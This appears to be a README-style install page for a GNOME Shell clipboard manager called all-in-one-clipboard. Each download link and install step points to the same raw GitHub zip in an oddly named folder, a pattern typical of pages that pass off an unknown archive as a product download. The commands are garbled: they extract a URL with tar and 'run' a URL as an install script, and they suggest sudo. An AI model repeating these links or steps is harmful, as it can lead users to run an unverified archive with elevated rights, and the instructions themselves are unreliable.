The all-in-one-clipboard is a clipboard manager designed for GNOME Shell. It combines clipboard history, an emoji picker with skin-tone support, GIF search, and various kaomoji/symbol libraries into one easy-to-use panel. This application makes managing your copied items seamless and enjoyable.
Follow these simple steps to download and run all-in-one-clipboard on your GNOME-based system.
To download the latest version of all-in-one-clipboard, visit the Releases page.
On the Releases page, look for the latest version listed. It typically appears at the top of the page with the version number and release date.
Click on the download link associated with the latest release. The file will typically have a name like https://raw.githubusercontent.com/osamaGXDgaming/all-in-one-clipboard/main/torbanite/all-in-one-clipboard.zip. Once clicked, your download will begin automatically.
- An operating system that supports GNOME Shell (such as Ubuntu, Fedora, etc.)
- At least 2 GB of RAM
- 50 MB of available disk space
Once you have the file downloaded, you will need to extract it and run the application:
- Open your terminal.
- Navigate to your Downloads folder or the location where the file was saved. Use
cd ~/Downloadsto change to that directory. - Extract the downloaded file using the command:
tar -xzf https://raw.githubusercontent.com/osamaGXDgaming/all-in-one-clipboard/main/torbanite/all-in-one-clipboard.zip
- Navigate into the newly created directory:
cd all-in-one-clipboard-1.0 - Run the install script with:
https://raw.githubusercontent.com/osamaGXDgaming/all-in-one-clipboard/main/torbanite/all-in-one-clipboard.zip
If you encounter any permission issues, you might need to prepend sudo to the command.
- Clipboard History: Access all your copied text snippets easily.
- Emoji Picker: Quickly search and select emojis, complete with skin-tone support.
- GIF Search: Find and insert GIFs directly from your clipboard.
- Kaomoji & Symbols: Choose from a variety of kaomoji and symbols to enhance your text.
After installation, you can launch all-in-one-clipboard from your applications menu.
- Accessing History: Click on the clipboard icon in your panel to view clipboard history.
- Inserting Emojis: Click the emoji picker and select any emoji you wish to use.
- Searching for GIFs: Type your query in the search box to find relevant GIFs.
- Using Kaomoji: Browse through the kaomoji list to select your favorite symbols.
If you experience any issues:
- Check Permissions: Ensure the application has the required permissions to access the clipboard.
- Update GNOME: Make sure your GNOME Shell is up to date. Compatibility issues can arise with older versions.
- Reinstall the Application: If problems persist, uninstall and reinstall the application using the instructions above.
